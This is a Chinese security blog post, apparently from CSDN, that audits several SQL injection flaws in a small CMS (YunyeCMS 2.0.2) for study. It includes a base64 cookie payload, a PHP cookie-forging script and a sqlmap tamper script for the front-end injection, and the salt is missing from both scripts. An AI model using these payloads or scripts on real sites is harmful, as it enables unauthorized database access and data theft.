sql 截取_某CMS的多处SQL注入审计分析

最新推荐文章于 2023-03-24 15:39:04 发布
最新推荐文章于 2023-03-24 15:39:04 发布
阅读量85 收藏
点赞数
文章标签: sql 截取 sql 把某一列拼接 sql 查询结果拼接 sql盲注如何解决
前言

某天挖完洞闲来无事浏览CNVD看到某CMS更新了一溜的SQL注入,似乎起了强迫症,于是准备分析学习记录一下,顺便填充一下工作内容(哈哈题外话请忽略),其实是个小众CMS,分析起来也不算难,后台的比较简单,主要看前台的。

b69f96c685348ffbd906490672836b19.png

版本:2.0.2PS:官方已跟新至了最新版本,且在最新版修复了以下漏洞。该文仅作学习和交流。

SQL注入1-后台de***.php

对应CNVD编号:CNVD-2020-12871

漏洞出现在在后台文件de***.php中,de***_add函数对GET和POST参数先进行了是否empty判断,最终将传入的几个参数传给了edit_admin_department。

3e72f4dd9a56448a6910b8f8ed535426.png

跟入edit_admin_department,对参数依次进行了处理,但是发现只有$departmentname,$olddepartmentname进行了usafestr安全过滤,漏网的$id拼接到了sql语句中执行。

95732f68f78e8c98dab0e53c28ef0549.png

最终导致了SQL注入。

69a682683730b16a8040d1e3469f45cb.png
SQL注入二-lo***.php

这原本是在后台目录下但其实也是一个不需要验证后台登录的前台注入。

对后台文件的功能点分析。在lo***.php中功能adminlogin先获取了登陆者的ip,该ip参数的传参过程为getip()->$logiparr->encode->$logipstr然后拼接到$sql语句中lastip,中间并未进行其他过滤。

46a7e598d5aaa990522b75f2192974f2.png

再来查看getip()

81ad4024cc2a53549ddd36796e6c1337.png

该函数返回获取的ip,而HTTP_X_FORWARDED_FOR为我们可控的http头部。

86ebd4f53736660a5170207299a5bf4e.png
54ef74defe60d29a6e87500639d8eccb.png
SQL注入3-roe.php

文件role.php同理对参数id没有进行过滤只进行了是否empty判断,最终在edit_admin_role中进行SQL查询。

8aabc7f3abbbccf1c82c647e245944ea.png
2e5c2b180481744496fd0800d2fef193.png

根据查询结果返回存在或not exit是一个盲注直接丢入sqlmap秒出结果。

c63b3feedb478802c40d3e6d1f699b16.png

同类问题的还有yunyecmsmodel.php等文件自行发现,直接附上结果。

4aa750f92d4fd546f31a2b58c5b765dd.png

接着我们继续来看前台的。

前台sql注入

问题出现在前台me***.php文件中,自定义表单customform中的userid从cookie中获取,截取一段数据包可以看到cookie的userid如下:

ff0103ae83969ecb1edb865abd79ab20.png

经过了加密处理,根据解密算法yunyecms_strdecode可以在corefun.php找到对应的加解密算法

0b4693ea15ab5b9bff814087d23656a2.png

因为cookie里的userid可控因此我们根据算法流程我们可以在cookie中伪造userid值。还是用刚刚以上截取的userid测试。

54f9a55cbc0cb2243a536065982199e3.png

可以看到真实的userid为9。构造一个SQL注入,生成如下payload:

c695a2f37631ee1b8a096087f5b58075.png

YmM0OWM5ZWY1ODk5ZGRkNzM0T1NjZ1lXNWtJSE5zWldWd0tEVXA4ZDdlNzk5NTliNDQyYTI1ZDE0ZWUzODZmZDI4MzY5OTM0YQ==

payload生成代码front-test.php为:

<?phpfunction yunyecms_strencode($string,$s){    return base64_encode(substr(md5($salt),8,18).base64_encode($string).substr(sha1($salt),0,35));}function yunyecms_strdecode($string,$s){    $retstr=base64_decode($string);    $SHA1salt=substr(sha1($salt),0,35);    $md5salt=substr(md5($salt),8,18);    $retstr=substr($retstr,strlen($md5salt));    $retstr=substr($retstr,0,(strlen($retstr)-strlen($SHA1salt)));    return base64_decode($retstr);}if ($_GET['cookie']) {    $string=$_GET['cookie'];    $userid=yunyecms_strdecode($string);    echo $userid;}if($_GET['userid']){    $string=$_GET['userid'];    $cookie=yunyecms_strencode($string);    echo $cookie;}

继续追溯可控的userid,可以看到userid经过步骤3->4->5传递到了pagelist函数中

30d56fc023c7f0daebae876610e8bd88.png

跟入pagelist函数,将$where拼接到了sql查询语句中$sqlcnt,然后交给了前几次SQL注入都出现的SQL查询函数GetCount中。

fe92127c3fb6f40263c94e9343bd3bee.png

详细查看下该函数,直接进行了sql查询。

4fd3ff5b77a36347c0a2bccdfa8d5206.png

附上截图

47e02b5fcf510dbde55913236127bce9.png

手工有点麻烦,又想丢入sqlmap怎么办,由于userid经过了加密和编码处理,于是根据算法流程写一个tamper就可以很好的解决了,

0890ff4b7506df9bc975288e096f6f32.png

对应tamper的的脚本为

yunyecms_front_sqli_tamp.py

#!/usr/bin/env python"""Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)See the file 'LICENSE' for copying permission"""import base64import hashlibfrom lib.core.enums import PRIORITYfrom lib.core.settings import UNICODE_ENCODING__priority__ = PRIORITY.LOWdef dependencies():    passdef md5(data):    hash_md5 = hashlib.md5(data)    md5data=hash_md5.hexdigest()[8:18]    return md5datadef sha1(data):    string_sha1=hashlib.sha1(data).hexdigest()[0:35]    return string_sha1def yunyecms_strencode(string):    s    return base64.b64encode(md5(salt)+base64.b64encode(string)+sha1(salt))def tamper(payload, **kwargs):    """    Base64-encodes all characters in a given payload    >>> tamper("1' AND SLEEP(5)#")    'MScgQU5EIFNMRUVQKDUpIw=='    """    return yunyecms_strencode(payload) if payload else payload

搞定完事~

weixin_39608118
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
转载:SQL注入Mysql
水墨痕迹
06-22 172
SQL注入Mysql(图)时间:2005-09-20 18:49来源:中国网管联盟 bitsCN编辑字体:[大 中 小] 声明   本文仅用于教学目的,如果因为本文造成的攻击后果本人概不负责,本文所有代码均为本人所写,所有数据均经过测试。绝对真实。如果有什么遗漏或错误,欢迎来安全天使论坛(http://www.4ngel.net/forums)和我交流。 前言   2003年开始,喜欢脚本攻击的人...
sqlmap mysql案例_sqlmap简单mysql注入演示附截图
weixin_39986973的博客
01-19 121
安装教程百度一下就有了.首先下载需要的文件,如果是windows环境直接到看大牛的视频,学习一下,附上截图....算是转载吧...只是为了分享一下..下边是实例:sqlmap.py -update 更新-h helpsqlmap.py -u --dbms "Mysql" --current-user/* 注解:获取当前用户名称current user: ...
SQLMASQLMAP中文说明(linux版本)
weixin_34007906的博客
06-22 204
2019独角兽企业重金招聘Python工程师标准>>> ...
SQL注入攻防入门详解
weixin_30399055的博客
12-01 147
毕业开始从事winfrm到今年转到 web ,在码农届已经足足混了快接近3年了,但是对安全方面的知识依旧薄弱,事实上是没机会接触相关开发……必须的各种借口。这几天把sql注入的相关知识整理了下,希望大家多多提意见。 (对于sql注入的攻防,我只用过简单拼接字符串的注入及参数化查询,可以说没什么好经验,为避免后知后觉的犯下大错,专门查看大量前辈们的心得,这方面的资料颇多,将其精简出自己觉得重要的,...
sql注入常见函数(附图详解)
君莫hacker的博客
09-23 8197
目录0x01 mysql数据库基本函数0x02 union联合注入函数函数concat()函数concat_ws()函数group_concat()0x03 sql盲注函数1. 布尔盲注函数函数length()函数left()与函数right()函数substr()函数mid()函数ascii()函数ord()2. 时间盲注函数函数sleep()函数if()0x04 报错注入函数函数floor()函数exp()函数updatexml()函数extractvalue()0x05 读写文件函数 0x01 mys
AppCMS_v2.0_代码审计1
08-03
【AppCMS_v2.0 代码审计知识点】 在进行代码审计时,我们通常会关注以下几个核心方面,以确保系统的安全性: 1. **SQL注入防护**: - 在AppCMS v2.0中,预处理了搜索时的值,通过`htmlspecialchars`函数对`$_GET`...
帝国cms万能标签实现标题截取后自动加入省略号的方法
09-29
帝国CMS是一款在中国广泛使用的网站内容管理系统(CMS),它为站长们提供了一套非常便利的网站内容管理工具。在使用帝国CMS的过程中,站长们可能会遇到标题过长导致页面排版错乱的问题。为了解决这个问题,一般需要...
dede_sql用法
10-27
{dede:sql sql='your_sql_statement_here'} // 显示查询结果 {/dede:sql} ``` 其中`sql`属性是必须的,用于指定要执行的SQL语句。 #### 三、示例解析 根据提供的内容,我们可以看到两个`dede_sql`的具体应用实例...
帝国cms选取两个表的集合实现按某字段排序
09-29
帝国CMS是一款广泛应用于中小企业建站...以上知识点详细阐述了如何在帝国CMS中选取两个表的集合并按某字段排序的具体实现过程,对于希望深入学习帝国CMS开发和数据库操作的开发者来说,这些知识都是非常基础且必要的。
易点内容管理系统 DianCMS v6.4.0 SQL版.zip
07-08
【增加】单图片多小图时,截取小图的方式由之前的等比例缩小后,从左上角开始截图指定大小图片。再增加等比例缩小后,保留完整性,不足部分填充空白。 【增加】字段类型为表单类型时,增加文件上传和多行文本框 ...
网络渗透测试实验3:SQL注入(DVWA+SQLmap+Mysql注入实战)
zzzfff__的博客
11-21 1938
实验环境搭建。启动Metasploitable2虚拟机。1.输入账号密码【msfadmin】,输入【ip a】查询ip2.打开浏览器,输入该ip,进入DVWA输入账号密码:admin,password。账号密码使用nmap穷举,见我的另一篇博客3.注入点发现。首先肯定是要判断是否有注入漏洞。在输入框输入1,返回ID: 1返回正常;
玩玩12306的SQL注入漏洞
Linvo's blog
09-27 4670
下午那会儿微博上疯传一张12306的SQL注入漏洞截图: 以前没怎么玩过,那会儿正好有空,所以就上去瞅瞅。 根据trace提示简单构造一个: ' OR '1'='1' OR ZIZ=' 注入后的效果应就是: select * from TB_INFO_CLCS  where flag = 'Y'  and czdm ='G' and cxdm like '%' OR
网络安全必学的SQL注入
最新发布
瓦罗兰特顶级C位的博客
03-24 743
要学会如何防御SQL注入,首先我们要学习它的原理。
SQL注入导图
Fly_鹏程万里
06-15 1060
asp sql查询字段 过滤空格_这可能是最全的SQL注入总结,很有用
weixin_39869959的博客
10-26 461
SQL注入原理当客户端提交的数据未作处理或转义直接带入数据库,就造成了sql注入。攻击者通过构造不同的sql语句来实现对数据库的任意操作。SQL注入的分类按变量类型分:数字型和字符型按HTTP提交方式分:POST注入、GET注入和Cookie注入按注入方式分:布尔注入、联合注入、多语句注入、报错注入、延时注入、内联注入按数据库类型分:sql:oracle、mysql、mssql、access、sq...
SQL报错注入小结
热门推荐
lixiangminghate的专栏
05-13 1万+
sqli-labs的前4个实验(Lab1-Lab4)是基于SQL报错注入(Error-based injection)。什么是SQL报错注入?这是一种页面响应形式。响应过程如下:当用户在前台页面上输入检索内容时,后台将前台页面上输入的检索内容无加区别的拼接sql语句,送给数据库执行。数据库将执行结果返回给后台。后台将数据库执行结果无加区别的显示到前台页面上。上面这句话中,我用了2个"无加区别"-...
【2·未知攻焉知防】 如何利用SQL注入,结合图片马渗透入侵服务器
胡杨林
06-06 2815
1. 概述   此文原出自【爱运维社区】: http://www.easysb.cn   SQL注入漏洞是由于对字符串的过滤不严格导致的,根据数据外带方式不同,可分为时间盲注,bool盲注,错误等等很多种。如果当前站点的数据用户是root的话,那么就会导致服务器上的所有数据库泄露,假如不是root用户话,那么泄露的数据库仅仅为当前用户有权限的数据库。但是,即便这样能够访问当前的站点数据
从入门到入土:[SEED-Lab]-SQL注入攻击|SQL Injection Attack Lab|详细说明|实验步骤|实验截图
Q_U_A_R_T_E_R的博客
10-26 4035
此博客仅用于记录个人学习进度,学识浅薄,若有错误观点欢迎评论区指出。欢迎各位前来交流。(部分材料来源网络,若有侵权,立即删除) 本人博客所有文章纯属学习之用,不涉及商业利益。不合适引用,自当删除! 若被用于非法行为,与我本人无关 [SEED-Lab]-SQL注入攻击实验环境环境配置apachePDF文件实验 实验环境 seed-ubuntu 20.04 seed自带虚拟机已经安装好了mysql服务,root密码是seedubuntu 实验室环境。该实验室已经在我们预构建的Ubuntu16.04VM上进行
SQL注入的一般过程
lifanxin的博客
05-07 1万+
SQL注入的一般过程概述SQL注入一道例题总结 概述   SQL注入是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。SQL注入大致可以分为两类:数字型注入和字符型注入。 SQL注入   这里介绍下SQL注入的基本流程,需要明确的是在实际注入中,我们都是无法看到具体的后端代码的,也就是无法知晓具体的SQL拼接
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值